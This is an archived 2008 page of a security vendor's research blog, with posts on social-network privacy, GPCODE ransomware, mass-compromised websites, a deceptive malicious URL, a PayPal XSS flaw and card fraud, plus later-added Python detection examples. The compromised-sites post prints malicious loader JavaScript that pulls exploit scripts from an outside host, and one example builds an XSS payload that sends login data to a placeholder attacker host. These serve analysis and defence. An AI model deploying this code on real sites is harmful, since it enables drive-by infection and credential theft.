August 2008
CA Security Advisor Research Blog

Find out what our research team is saying about the latest security threats in the CA Security Advisor blog
  • Becky Spraggs and Social Networking Privacy

    In a good example of how seemingly innocuous personal information can be used to cause significant harm, a British woman's pictures and information were copied from her Facebook profile and used to create a false profile on a Canadian fetish site (which itself offers social networking).

    As reported by The Telegraph and This Is London, Becky Spraggs was on vacation when she received a call informing her that four of her pictures from Facebook had been mixed with explicit images of a woman who resembled her and used to create a profile on FetLife, a social networking site for the BDSM/fetish community. This profile used her real name and other information about her, but provided a false biography claiming that she was "looking to get into soft/hard porn films."  The profile suggested that anyone interested in "using and abusing" her should call a number and ask for either her or her manager Paul. 

    The given phone number in fact led to her ex, Paul Farrow, who dealt with roughly 50 calls a week, including international calls for which he was being charged.  As of this writing, the profile is no longer up, and Mr. Farrow is reported to have blocked international calls, which hopefully offers him some relief.

    This incident serves as a prime example of the unintended loss of privacy that often accompanies social networking.  Many users of social networks assume that only people in their immediate web of friends can see their profile, but this is rarely the case.  Of Myspace, Friendster, Orkut, and Facebook, not one site defaults to a "friends-only" privacy setting.  Orkut, Myspace, and Friendster make profiles visible to the entire userbase by default.  Facebook is somewhat more conservative, defaulting to "friends and networks" being able to view a profile.  In practice, however, this offers little privacy because Facebook networks are generally huge, often containing millions of members.  In addition, the location-based networks, such as the "London" network to which Ms. Spraggs belonged, require no verification to join, so that anyone could have become part of that network and suddenly have had full access to her profile.

    Facebook does allow users to restrict access to their profiles, galleries, and other personal information.  This can be done by logging in, then following the "Privacy" link in the upper right corner, and finally selecting "Profile".  This will allow you to restrict the personal information on your profile to people of your choosing.  Be aware that Facebook treats your photo albums separately, however.  In order to restrict access to pictures in your photo galleries you must follow the "Edit Photo Albums Privacy Settings" link on the Profile Privacy page. 

    Another very important principle illustrated by this story is that a significant amount of harm can be caused by someone with access to seemingly innocuous information.  With the use of just her ex's phone number, some perfectly innocent and respectable pictures of her, and the name and location information from her profile, a malicious party was able to significantly disrupt the lives of both Becky Spraggs and Paul Farrow.  Many users are improving their privacy practices with regard to information like bank accounts, social security numbers, and home addresses.  It is important to remember, however, that in the wrong hands almost any form of personal information can be used to inflict harm.

    If you are reading this and are a user of social networking sites, please go check the privacy settings associated with each of your accounts.  What you find may surprise you.  In general, we propose five rules for protecting your privacy on social networking sites.   

    1. Don't give out personal information that can lead to identity theft: your place of birth, date of birth, or social security number.
    2. Increase your privacy settings to "friends only" for both your profile and your pictures.
    3. Pictures can last a lifetime. Only put up pictures/videos that you would want your parents to see.
    4. When signing up for new sites, fill out your privacy settings before you fill out your profile.
    5. Friending someone is not just adding a name to your list.  It trusts them with your information, and should only be done for people you'd trust with your real-life belongings.

    Sticking to these rules is quick and simple, and it gives you control over who you trust with the details of your life.

  • We call it RANSOMWARE: look out!

    The problem is not a new one; however, the research community has found a new variant of the notorious GPCODE
    malware. To be precise, we classify it as "ransomware" (http://en.wikipedia.org/wiki/Ransomware_%28malware%29).

    The new GPCODE variant encrypts the victim's documents with a 1024-bit key, and to date it is the most
    damaging variant we have seen.

    This is what I obtained when I ran the malware in my laboratory:


    This popup displays a message that says your files are encrypted with a 1024 bit-key, and what I observed is
    that every document file (.txt, .doc, .pdf) is encrypted as shown in the image below.  My pdf document for the
    linksys AG241 router setting is not readable anymore.


    The extension added to your document files is ._CRYPT.

    According to the message, you need to buy a decryptor tool to recover your documents.  The Yahoo e-mail
    address through which the tool is sold is randomly generated, so it cannot be used to identify and take
    action against a single owner.

     

    Recommendations:

    • Since CA Anti-Spyware detects the GPCODE ransomware variant (http://www.ca.com/securityadvisor/pest/pest.aspx?id=453098767), the safest approach is to keep
      your anti-spyware software up to date so that the malware is blocked before it can run and encrypt your files.
    • If you realize you have launched something similar to what has been described above, do NOT reboot
      your machine, because our lab tests show that the ransomware does not affect the machine until it is rebooted.
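    As an added example that is not part of the original post, the following Python script shows how a responder could triage a copy of a user's files for this variant using the two observations above: encrypted documents receive the "._CRYPT" suffix, and their contents are no longer readable. The sample files, the paths and the entropy threshold are constructed for the example; the suffix and the document types are the ones reported in the post.

```python
import math
from collections import Counter

# Observable from the post: encrypted documents get the suffix "._CRYPT".
RANSOM_SUFFIX = "._CRYPT"
# Document types the post reports as encrypted.
DOC_EXTS = (".txt", ".doc", ".pdf")
# Assumption: ciphertext is close to 8 bits/byte, while plain text and legacy
# .doc files sit far lower. Compressed formats (PDFs with deflated streams,
# .docx) also score high, so treat this signal as a hint, not a verdict.
ENTROPY_THRESHOLD = 7.5


def shannon_entropy(data):
    """Bits of entropy per byte of `data` (0.0 for empty input, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage(files):
    """Classify a mapping of path -> file contents.

    Returns the renamed (._CRYPT) files, document files whose contents look like
    ciphertext even though they were not renamed, and an overall verdict.
    """
    renamed, opaque = [], []
    for path, data in files.items():
        if path.endswith(RANSOM_SUFFIX):
            renamed.append(path)
        elif path.lower().endswith(DOC_EXTS) and shannon_entropy(data) >= ENTROPY_THRESHOLD:
            opaque.append(path)
    return {
        "renamed": sorted(renamed),
        "opaque_documents": sorted(opaque),
        "suspected_infection": bool(renamed),
    }


# Constructed sample of a user's directory tree (not taken from a real infection).
CIPHERTEXT_LIKE = bytes(range(256)) * 8  # uniform byte distribution: entropy exactly 8.0
SAMPLE_FILES = {
    "C:/Users/me/Documents/notes.txt": b"Router setup notes for the AG241.\n" * 40,
    "C:/Users/me/Documents/AG241_manual.pdf._CRYPT": CIPHERTEXT_LIKE,
    "C:/Users/me/Documents/report.doc": CIPHERTEXT_LIKE,  # overwritten in place, not yet renamed
    "C:/Users/me/Pictures/photo.jpg": CIPHERTEXT_LIKE,    # JPEGs are high-entropy by nature; not a document
}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_FILES).items():
        print(f"{key}: {value}")
```

    The suffix is the reliable indicator; the entropy check only helps catch documents that were encrypted but not yet renamed, and it will also flag legitimately compressed files, so review those hits by hand.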
  • Compromised websites: a real danger for Internet users

    It seems Internet users get no peace anymore. We have witnessed many security problems on the Internet
    to date, but nothing like this latest period, which from my personal perspective deserves to be called
    "the age of compromised websites".

    The anti-malware research community is receiving a growing number of daily reports of innocent websites
    being compromised and "infected" with malicious scripts that redirect visitors to malicious hosts, which in
    turn serve and drop malware.

    This kind of attack is not new, and we have been working to understand what happens during these
    attacks, but so far it has not been very clear how the attackers operate.

    We have received reports of dozens and dozens of compromised websites containing iframes (see http://en.wikipedia.org/wiki/IFrame for an explanation of iframes) redirecting users to many Chinese
    malicious hosts.

    What we are sure of is that malicious individuals are using automated tools to exploit the websites.
    A common exploit strategy is: 1) use a search engine such as Google to find URLs that look like potentially
    vulnerable applications, and then 2) exploit them. The exploit in this scenario is an SQL injection: a crafted
    request parameter carries an SQL statement that appends a script tag to text stored in the site's database, so that
    the tag is emitted in every HTML page built from that data.  What eventually happens is that the attacker finds a weakness in the website, plants malicious code, and thereby "infects" the website.

    A tool currently under analysis, and recently identified as responsible for many "infected" websites,
    comes directly from the Chinese underground and looks like this:


    As shown in the screenshot above, the tool uses the Google search engine to collect candidate websites
    matching a search query, in this case inurl:".asp" inurl:"a=", i.e. ASP pages that take a parameter named "a".
    The search string is configurable, so any signature of a vulnerable application can be used to select targets.
    Another interesting part of the tool is the script tag it injects into the vulnerable websites to
    compromise them (see below):


    As shown, the form in this case is configured to inject the string:

    <script src=http://www<dot>2117966<dot>net/*uckjp.js></script>

    Dissecting the malicious javascript file we find further interesting information:


    {document.write ("<iframe width=-1 height=-1 src=\"hxxp://www<dot>2117966<dot>net/q.htm\"></iframe>");}
    else
    {document.write ("<script src=http:\/\/www.2117966.net\/Xjp.js><\/script>");}

    The fragment above (its leading if-condition is not shown) means that the first script hands off to further
    malicious content, still on the same host (2117966.net): a hidden iframe to q.htm in one branch and a
    second script, Xjp.js, in the other.

    Content of q.htm:


    document.write("<script src=http://www.2117966.net/Ajax.gif><\/script>")
    document.write("<iframe width='0' height='0' src='http://www<dot>2117966<dot>netMs06014.htm'></iframe>")}
    else{
    try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");}
    catch(r){};
    finally{if(r!="[object Error]"){
    document.write("<script src=http://www<dot>2117966<dot>net/Real.js><\/script>")}}
    try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");}
    catch(g){};
    finally{if(g!="[object Error]"){
    document.write("<script src=http://www<dot>2117966<dot>net/Bfyy.gif><\/script>")}}
    try{var i;var thunder=new window["ActiveXObject"]("DPClient.Vod");}
    catch(i){};
    finally{if(i!="[object Error]"){
    document.write("<script src=http://www<dot>2117966<dot>net/Ms07004.html><\/script>")}}
    try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1");}
    catch(j){};
    finally{if(j!="[object Error]"){
    document.write("<script src=http://www<dot>2117966<dot>net/ms06067.js><\/script>")}
    if(r=="[object Error]"&&g=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){
    document.write("<iframe width='0' height='0' src='http://www<dot>2117966<dot>net/QVod.html'></iframe>")}}

    In the branch visible at the top, the script writes a further script reference (Ajax.gif, which the browser
    executes as script regardless of its extension) and a hidden iframe to Ms06014.htm.  In the else branch it
    fingerprints the visitor by attempting to instantiate ActiveX controls: IERPCtl.IERPCtl.1, MPS.StormPlayer,
    DPClient.Vod and GLCHAT.GLChatCtrl.1 (the variable names reals, storm, thunder and lianzhong suggest RealPlayer,
    Storm Player, Thunder and Lianzhong GLChat).  For each control that exists it writes a matching script
    (Real.js, Bfyy.gif, Ms07004.html, ms06067.js), and if none is present it falls back to an iframe to QVod.html.
    Several of the file names echo Microsoft security bulletin numbers.  The various iframes and scripts lead to
    other malicious pages and scripts, which in turn lead to yet more, creating a long chain of nested links that
    drops, at the end of the chain, dangerous malware on the victim machines.
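    The checks below are an added example written for this post; they are not part of the attack kit or of CA's tooling. They do two things a site owner or analyst would want from the material above: flag script and iframe tags in a served page that point off-site or are sized to be invisible (the shape of the injected string and of the q.htm iframe), and pull out the ActiveX ProgIDs that a script probes for, which reveal the plugins the kit targets. The sample page, the hostname www.shop.example and the sample script are constructed; the injected host is the one named in the post, with the defanging removed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectionScanner(HTMLParser):
    """Collect script and iframe tags that point off-site or are sized to be invisible."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.external_scripts = []
        self.hidden_iframes = []

    def _foreign(self, src):
        host = urlparse(src).hostname
        return bool(host) and host.lower() not in self.own_hosts

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        if tag == "script" and self._foreign(src):
            self.external_scripts.append(src)
        elif tag == "iframe":
            tiny = any(_non_positive(a.get(d, "")) for d in ("width", "height"))
            if tiny or self._foreign(src):
                self.hidden_iframes.append(src)


def _non_positive(value):
    """True for width/height values such as 0, '0' or -1 that make an iframe invisible."""
    try:
        return int(value.strip("'\" ")) <= 0
    except ValueError:
        return False


def scan_page(html_text, own_hosts):
    """Scan one served page; own_hosts lists the hostnames the site legitimately uses."""
    p = InjectionScanner(own_hosts)
    p.feed(html_text)
    p.close()
    return {"external_scripts": p.external_scripts, "hidden_iframes": p.hidden_iframes}


# Matches new ActiveXObject("ProgID") and the window["ActiveXObject"] spelling used by the kit.
PROBE_RE = re.compile(
    r'new\s+(?:window\[\s*["\']ActiveXObject["\']\s*\]|ActiveXObject)\s*\(\s*["\']([^"\']+)["\']'
)


def activex_probes(js_text):
    """ProgIDs a script tries to instantiate; each one fingerprints a targeted plugin."""
    return PROBE_RE.findall(js_text)


# Constructed sample page for an imaginary shop at www.shop.example.
SAMPLE_PAGE = """<html><head><title>Products</title>
<script src=/js/site.js></script></head><body>
<h1>Products</h1><p>Widget A</p>
<script src=http://www.2117966.net/uckjp.js></script>
<iframe width=-1 height=-1 src="http://www.2117966.net/q.htm"></iframe>
</body></html>"""

# Constructed sample modelled on the probing code quoted in the post.
SAMPLE_JS = """try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");}catch(r){};
try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");}catch(g){};
var x = new ActiveXObject('DPClient.Vod');"""

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE, {"www.shop.example"}))
    print(activex_probes(SAMPLE_JS))
```

    Run scan_page over the rendered pages of a site rather than over its templates: the injected tag lives in database content, so it only shows up in the generated HTML. Hits on external scripts are not automatically malicious (CDNs and analytics are common), so pair the check with an allow-list of known hosts.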

    What can a user do?

    It is not easy to tell whether a website is "infected" or not.  Many users report that they simply browsed a website
    and then became "infected."  This does not leave you feeling well protected, especially if you are careful about
    where you browse.  As a result of this type of attack, a website that would normally be considered innocent or
    benign can stealthily become malicious.  One day the site is safe, the next it is dangerous.  This is what makes
    this type of attack so effective.

    From the user side, a safe approach is to keep your anti-virus and anti-spyware software up to date.  Additionally,
    one may consider setting Internet Explorer to prompt the user before following an iframe.  (See instructions here: http://support.microsoft.com/kb/182569/en-us)  Lastly, one may consider the use of content filtering tools.

    These tools are able to block malicious JavaScript and alert the user before the browser is redirected to another website.  Remember, it is typically the website that you are redirected to that hosts the malware that is downloaded to
    your computer.

    What can a website owner do?

    From the website owner's point of view, it is recommended to scan their web pages for known
    vulnerabilities.  This step alone will eliminate the majority of exploit vectors.  Of course there are potentially
    unknown, or "zero-day", vulnerabilities, but closing the known ones will greatly reduce the vulnerabilities
    that are most commonly exploited via automated tools.  Because the injection described above is an SQL injection,
    the fix at the application level is to pass request parameters to the database only through parameterized queries
    and to validate them before use.  Additionally, website owners can consider the security
    help service provided by search engines, as described here.
    Needless to say, it is strongly recommended to keep web servers up to date with the latest released patches;
    this hugely decreases the number of vulnerabilities.

  • The Anatomy and Deception of a Malicious URL

    In this article I promise deception, technological trickery, impart a bit of knowledge, insight, and all through what I hope to be an interesting read for you.


    I was browsing through a long list of malicious URLs and I came across an interesting URL that caught my eye, hxxp://www.yahoo550.com/...../logo.jpg?queryid=77092.  Your first question might be: what is a URL?  Well, most of you know it by another name; simply put, it is a text string that represents a website and its path or components.  URL stands for uniform resource locator.  Your second question might be: why did it catch my eye?  Well, let's take a closer look at the anatomy of a URL.  Trust me; the really interesting parts are coming soon.


    Take the website http://www.ca.com/.  The "www" is a host name (a label within the domain) that by convention denotes the site's main web server; it is optional when typing the address into your web browser.  The "ca" section is what is referred to as the domain name.  It often (but not always) indicates the name of something (i.e. McDonalds.com, or Microsoft.com).  It could also be something random, like 66123.net (which is actually registered).  The ".com" portion is the top-level domain, often called the suffix.  This usually hints at the type of organization operating the site.  For example ".edu" is reserved for educational institutions and ".gov" for the US government, while ".org" is customary (but not restricted) for non-profit organizations.  There are many others, but I think you get the point.  Anything that follows the host name (i.e. after ".com" or ".gov") is what is called the path, and this path (with special characters) can lead to static documents (web pages) or dynamically generated content such as user-requested values passed to and from a database.  More on that later.  For instance the URL http://www.ca.com/us/securityadvisor/ tells us that the domain belongs to CA, the "/us/" tells us that this web page belongs to those customers who chose US-English as their viewing site, and finally /securityadvisor/ is the directory that the user navigated to.  All of this makes up the full path or URL.


    So what makes this URL deceptive?


    Whew, now that that boring stuff is out of the way I can tell you more about the URL that I discovered.  At first glance the domain portion of the URL (yahoo550) looks very similar to the popular website and user community Yahoo!.  One might assume that this is one of Yahoo!'s thousands of webpages.  Did you know that Google owns 520 different domains?  That is right, so why wouldn't you think that Yahoo! owns yahoo550.com?  But they don't.  In fact someone by the name of Bill Adward owns it.  More on him later. 


    The yahoo550.com URL seems innocuous enough; in fact it looks very similar to Yahoo!'s Yahoo360 social networking website (similar to Facebook and MySpace).  The main difference is that when visiting the Yahoo360 site the URL actually reads http://360.yahoo.com/.  There the "360" is a host name within the yahoo.com domain, which only Yahoo! controls.  Similarly, at http://travel.yahoo.com/, yahoo.com is the domain and travel is the host name of the site that houses all of Yahoo!'s travel information.  In yahoo550.com, by contrast, "yahoo550" is itself the registered domain, and anyone can register such a name.  So you can see where one might think that yahoo550.com is part of the larger Yahoo! domain infrastructure.  But as stated, yahoo550.com is not owned or operated by Yahoo!.  This is a clear effort to deceive the public by obfuscating the URL.  Furthermore, when you visit the yahoo550.com website your computer is infected with malicious software.


    So why obfuscate a URL?


    Internet con artists (that is, criminals) obfuscate websites or URLs to trick users into visiting their sites by making people think they are clicking on an innocent or familiar URL, for example a link embedded in an email or web page.  This tactic is also used in phishing.  So what is the benefit of tricking people?  The main reason is money.  There is a flourishing criminal enterprise running on (or underneath) the Internet.  Mostly, when unsuspecting people click on what seems like an innocent URL, their computer could be infected with malware (malicious software).  This software could take complete control of your computer, turning it into a bot, or use it to display revenue-generating adware.  A bot is one of an army of infected computers controlled by others, called a botnet.  For more information on botnets you can read the following: http://community.ca.com/blogs/securityadvisor/archive/2007/11/07/web-of-deception.aspx.  The worst-case scenario is when the installed software is used to steal personal information, such as credit card or social security numbers.  I am sure you have heard about the horrors of identity theft.


    There are many ways to disguise a URL.  One is typosquatting, which registers a domain that differs from the real one by a letter or two, or that is simply confusingly similar.  This might mean inserting an extra character such as an "i" or "l", or swapping a "1" for an "l" or a "0" for an "O".  It is hard to tell the difference when they are all combined in a string of characters.  As promised, I will talk more about the path and how in my example it was used to deceive Internet users.


    When describing the full path (i.e. /us/securityadvisor/ or /..../logo.jpg?queryid=77092), some characters in this portion of the URL are special and have a different meaning than regular plain-text characters.  What do I mean by that?  Well, characters such as "&", "?" and "=" all have special functions in the URL string.  A URL can carry a query string after the path.  It is introduced by a "?", and what follows the "?" is interpreted by a back-end program that handles the user's request or query.  Sorry for the techno-babble, but here is what I mean.  If you went to espn.com and opened their gallery of sports images you would see a URL that looks something like this: http://sports.espn.go.com/espn/apphoto/photo?photoId=1880786&sportId=90.   Let's cut the URL down to the interesting part, photo?photoId=1880786&sportId=90.  The first "photo" is an application that reads the string of text following the "?".  That string is made of name=value pairs separated by "&": "photoId=1880786" tells the "photo" application which file (or photo) to return to the user, and "sportId=90" is the identifier for pictures in the ESPN database that are hockey-related.  Pictures that fall under the NFL would be "sportId=28".  These are nothing more than groupings.
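    To make the anatomy concrete, here is an added Python example (not from the original post) that splits a URL into the parts described above and applies the deception test the post is building up to: a brand name in a URL is legitimate only when the registered domain is the brand's own, so 360.yahoo.com passes while yahoo550.com, and a digit-for-letter swap such as paypa1.com, are flagged. The brand table, the confusable-character map and the two-label rule for the registered domain are simplifying assumptions made for the example; real code should consult the Public Suffix List. The ESPN and yahoo550 URLs are the ones quoted in the post.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption: a tiny map of characters that are visually confused with letters.
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "|": "l"})

# Assumption: brand names and the registered domain each brand really controls.
BRANDS = {"yahoo": "yahoo.com", "paypal": "paypal.com"}


def anatomy(url):
    """Split a URL into scheme, host, subdomain, registered domain, TLD, path and query."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    labels = host.split(".") if host else []
    # Simplification (assumption): the registered domain is the last two labels.
    # Production code should use the Public Suffix List so that names such as
    # example.co.uk are split correctly.
    registered = ".".join(labels[-2:])
    return {
        "scheme": parts.scheme,
        "host": host,
        "subdomain": ".".join(labels[:-2]),
        "registered_domain": registered,
        "tld": labels[-1] if labels else "",
        "path": parts.path,
        "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
    }


def lookalike_of(url, brands=BRANDS):
    """Return the brand a URL imitates, or None when the registered domain is the brand's own.

    360.yahoo.com is legitimate because its registered domain is yahoo.com;
    yahoo550.com and paypa1.com merely contain the brand name inside a domain
    that anyone can register.
    """
    a = anatomy(url)
    if a["registered_domain"] in brands.values():
        return None
    label = a["registered_domain"].split(".")[0]
    normalized = label.translate(CONFUSABLES)  # undo 1->l, 0->o style substitutions
    for brand in brands:
        if brand in normalized:
            return brand
    return None


if __name__ == "__main__":
    for u in ("http://360.yahoo.com/",
              "http://www.yahoo550.com/...../logo.jpg?queryid=77092",
              "http://www.paypa1.com/login",
              "http://sports.espn.go.com/espn/apphoto/photo?photoId=1880786&sportId=90"):
        a = anatomy(u)
        print(u, "->", a["registered_domain"], a["query"], "imitates:", lookalike_of(u))
```

    The substring test is deliberately greedy and will also flag names that legitimately contain a short brand word, so in practice it is a triage signal to be confirmed against registration data, exactly the kind of whois check performed later in this post.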


    Okay, so where am I going with all of this?  I will tell you.  Let's go back to our original URL: hxxp://www.yahoo550.com/..../logo.jpg?queryid=77092.  When I first came across this, I assumed that by going to this website it would show me a logo (file type .jpg) which has the filename or value 77092.  So I would imagine that if I was on a website with hundreds of thumbnail pictures or logos and I selected one that I wanted to view, the URL would transform my request into a query "?queryid=77092" and present me that logo.  Well, that is not what you get when you visit this malicious URL.  Now just imagine that you receive an email like the one below.  If the topic interested you, you might just assume that the URL in the email is going to lead you to a website that belonged to Yahoo!.


    Figure 1


    Interestingly enough, no matter what number trails at the end of the query (i.e. 77092) you will get the same piece of malware.  I inserted various numbers, 4, 554, and 77458, each time I received the same malicious code.


    Here is an example of a website that you would more clearly be able to identify as potentially malicious:  hxxp://216.12.204.2/..../scfl.exe.  You can tell because the file at the end of the path is an .exe.  That does not in and of itself mean that it is malicious, but you would want to make sure that you trust the site and the executable that you are downloading and installing before you clicked the link.  The main difference between our yahoo550.com example and this one is that with the yahoo550 site, just visiting it can infect your computer with malware.  This is also known as a drive-by download.


    So what is behind this URL?


    Here is where the interesting parts occur.  There will be differing results depending on what Internet browser is used to visit the site (for the record, I do not recommend you doing so).  If you use Firefox your browser will render a little image in the top left hand corner that when resolved just displays the website.  See figure 2 below.


    Figure 2 


    The above page looks innocent enough; however, if you view the source for the page, you will see that there is actually a binary executable file that is packed with UPX.  UPX is a tool used for both compression and obfuscation.  UPX is popular among malware authors.  See figure 3 below.


    Figure 3


    Originally when I visited the site with Microsoft Internet Explorer browser, I received a popup window informing me that the file was being downloaded to my temporary directory.  The binary was disguised as a large empty image displayed in the Windows Picture and Fax Viewer as shown below, when in fact it is actually an executable file.  See figure 4 below.


    Figure 4


    Now upon returning to the site, instead of the aforementioned popup, the binary code is now just spewed across the browser screen as if it were just text.


    Just by visiting this website your system has now been infected with a trojan and backdoor, which seems to have some functionality issues.  This particular malware has taken on many names from the security community, such as Win32/Farfli.G, Trojan,DR.HMir.Gen2, Sus/Behav-194 and others.


    So, just who is this site registered to? Who is responsible for this?  According to Whois.net, the site was registered to Bill Adward in California.  This site was registered recently, in October of 2007, and only for one year.  The short-term lease of the domain name can be indicative of registering it for malicious or criminal intent.  I am fairly confident that all the information supplied is false as well, and the site was probably procured with a stolen credit card from previous criminal activity.  While the registration information for the yahoo550 site is domestic to the US, a website (6781.com) that is inserted into the web browser's favorites is registered in Beijing, China.  From what I was able to observe, no malware was dropped from this 6781.com site.


    The moral of this story is that you have to really be careful about clicking on URLs that are sent to you, even by people you know, and that you do not accidentally mistype an important URL such as your bank's or other financial institution's website.  There are a lot of unscrupulous people lurking on the Internet looking for victims to prey on.  People will often register websites for malicious or criminal purposes that are very similar to the popular or intended website.  While this particular piece of malware didn't really seem to cause any severe damage or impose immediate danger to the system, the fact remains that there is malware in existence that can be very dangerous, and the vector used by yahoo550.com is common and should be taken seriously.

  • PayPal Closes a Phishing Vulnerability

    Take a close look at this image.  You can click to enlarge it.


    It looks like the PayPal login page, but some things are off. For one, the title is "Login - PayPal Phishing Proof of Concept". That is because this isn't the PayPal login page at all, but a Phishing proof of concept. It was hosted on PayPal's servers and secured with PayPal's security certificates, but I had complete control over all the HTML, including where the login form sent usernames and passwords. This page would not have been caught by any of today's anti-phishing programs, because thanks to a vulnerability, PayPal itself was serving this page.


    Thankfully, the people we contacted at PayPal were responsive and the vulnerability was resolved within minutes. To our knowledge, their quick action prevented any customers from coming to harm as a result of this vulnerability, and we applaud their speedy and responsible action on this issue. It serves as a reminder, however, of the importance of secure development when web sites are being brought online, and the importance of speedy reaction when vulnerabilities are discovered.


    This vulnerability stemmed from an error-message JSP designed for server-side inclusion. When a page on PayPal needed to display an error message, it could call this JSP and pass in the message it wanted via the err_message variable. The JSP would return that same message, formatted in a yellow box with an exclamation-point graphic in front of it. This JSP was, however, reachable directly by the public in addition to being callable by other PayPal pages. The screenshot below shows an example of a simple "Hello World" message being passed to it:


    This page was initially forwarded to me as a joke, with people exploiting it to make PayPal return humorous or insulting error messages. Some quick tests, however, indicated that no checks were being performed on the input. The JSP wasn't differentiating between POST and GET variables, and did not filter the contents of this variable at all. This meant that HTML and JavaScript could be passed in place of "Hello World", and they would be inserted verbatim into the returned page at a fixed location.


    It may not seem like much, but this is all that someone needs in order to perform all sorts of mischief: it is a reflected cross-site scripting (XSS) flaw on PayPal's own domain. Browser exploit code could have been injected, causing visitors to download and run malware. The real risk associated with this type of vulnerability, however, is phishing. If the right code was passed in, the yellow box and error message could be hidden, and the contents of any other PayPal page displayed in their stead, modified to send login details or other personal information to a third-party server. Since the page is generated and returned by PayPal's servers, automated anti-phishing programs and even casual user inspection would reveal nothing wrong. In all aspects other than the URL path and parts of the source code, the page would be indistinguishable from a legitimate login form. It would even be returned over an https connection secured with PayPal's security certificates:



    Thankfully, in PayPal's case, malicious exploitation of this vulnerability seems to have been avoided. Similar vulnerabilities almost certainly exist across the web, however, and we want to take this opportunity to urge web application developers to follow stringent security practices. Follow a least-access approach, preventing outside users from requesting objects that are designed as server-side includes; validate your input; and always HTML-encode untrusted values when writing them into a page, so that injected HTML and JavaScript is rendered as text rather than executed.
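    The following Python sketch is an added example, not PayPal's code (their fragment was a JSP whose exact markup is not shown in the post). It contrasts the behaviour described above, the parameter written into the page verbatim, with the two fixes a developer would apply: HTML-encoding the value so it can only ever render as text, and refusing direct requests to a fragment that exists only for server-side inclusion while selecting messages by identifier instead of free text. The error-box markup, the message table, the err_id parameter and the attacker host are assumptions made for the example.

```python
import html
from urllib.parse import parse_qs

# Stand-in for the yellow error box described in the post (its exact HTML is an assumption).
ERROR_BOX = '<div class="error"><img src="/img/warning.gif" alt="!"> {message}</div>'

# Assumption: canned messages keyed by an identifier, so callers never need to pass free text.
MESSAGES = {
    "login_failed": "The e-mail address or password you entered is incorrect.",
    "session_expired": "Your session has expired. Please log in again.",
}


def render_error_vulnerable(err_message):
    """The behaviour the post describes: the parameter lands in the page verbatim."""
    return ERROR_BOX.format(message=err_message)


def render_error_fixed(err_message):
    """Same output, but <, >, &, ' and " are encoded so the value can only be text."""
    return ERROR_BOX.format(message=html.escape(err_message, quote=True))


def handle_request(query_string, is_server_side_include):
    """Gate for a fragment that is meant only for server-side inclusion.

    Direct (external) requests are refused outright. Included requests select a
    canned message by id; anything else still passes through HTML encoding as
    defence in depth.
    """
    if not is_server_side_include:
        return 404, ""
    params = parse_qs(query_string)
    err_id = params.get("err_id", [""])[0]
    if err_id in MESSAGES:
        return 200, render_error_fixed(MESSAGES[err_id])
    free_text = params.get("err_message", [""])[0]
    return 200, render_error_fixed(free_text)


# Constructed payload of the kind the post warns about: it hides the error box and
# re-points the page's login form at an attacker-controlled host (a placeholder name).
PAYLOAD = ('<style>.error{display:none}</style>'
           '<script>document.forms[0].action="http://attacker.example/collect";</script>')

if __name__ == "__main__":
    print(render_error_vulnerable(PAYLOAD))
    print(render_error_fixed(PAYLOAD))
    print(handle_request("err_message=Hello+World", is_server_side_include=False))
    print(handle_request("err_id=login_failed", is_server_side_include=True))
```

    In a real servlet container the is_server_side_include flag would come from the request dispatcher (for example a request attribute set only on include), not from anything the client can supply; the point is that the fragment must not be addressable from outside at all, and that encoding on output protects every remaining call path regardless.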

  • The Face of Credit Card Fraud – And What You Can Do

    The Human Story - Devil in the Details

     

    Last week I went over to a friend's house.  For purposes of this writing, I will call her Daffodil.  As we sat around the kitchen table, Daffodil mentioned she found a strange charge on her Visa statement -- billed to a company she never heard of and on a day she didn't use her card.  She is diligent about looking over her statement every month, but generally operates by her "double digit rule." She explained, "If it is under 10 bucks, I don't give it a lot of focus."  A lot of people I talk to seem to operate by roughly the same rule.  Is a small charge really worth the time it takes to investigate it?  The charge was for $9.87 to PICTUREGLOBUS.com.  She filed a complaint with Visa and it is pending further investigation.  I decided to beat Visa to it and conduct my own investigation.  What I learned is that PICTUREGLOBUS.com is not a legit business at all, but the very edge of a larger criminal operation - siphoning millions from unsuspecting card holders by charging small amounts across a lot of people and laundering the funds overseas.  PICTUREGLOBUS.com is just one of many fake websites.  A few of the others include: imaglobus.com, pictureglobus.com, templateglobus.com, photomeridian.com, dpchallenge.com, gizmosforlife.com, estarlandgames.com, digismarket.com, mfbpsite.com, embintelligence.com, treedonlainsite.com, brookshire-ent.com, bestdigimart.com, and embintelligence.com

     

    An Analysis of PICTUREGLOBUS

    I started my investigation by going to PICTUREGLOBUS.com (abbreviated PG for this writing).  Even though I saw no indications of malware on PG, I recommend not going there, given my subsequent findings.  On the surface, the site generally looked legitimate and professional - purportedly selling stock photo images (see image below).

     

    My first finding: Every link off the main page went to the same place - to a billing page asking for personal information and credit card information.  To be clear, Daffodil had never been to that site and definitely never entered her credit card information there.  My intent was only to see if the site was a legitimate business and a victim itself to another fraudster.  Obviously, I wasn't about to enter my personal credit card number or any other personal data, but still wanted to know what would happen if some unsuspecting user did.  What I did was buy a Visa Gift Card - which is anonymous and not tied to me, but lets one make purchases as if it were their own card.  I decided that I would try and purchase a weekly subscription - costing $2.99.  After entering this information and submitting payment, I was shocked to receive a confirmation email from the "PictureGlobus Support Team," reminding me of my login credentials.  I was surprised because if PG is just a front for other illegal operations, I assumed they wouldn't actually have a system in place to process purchases made on PG (the real business is illegally charging stolen credit card data).  I checked my Gift Card balance and almost immediately there was a charge for $2.99 - the cost of a weekly "subscription" (see image below).  

     

     

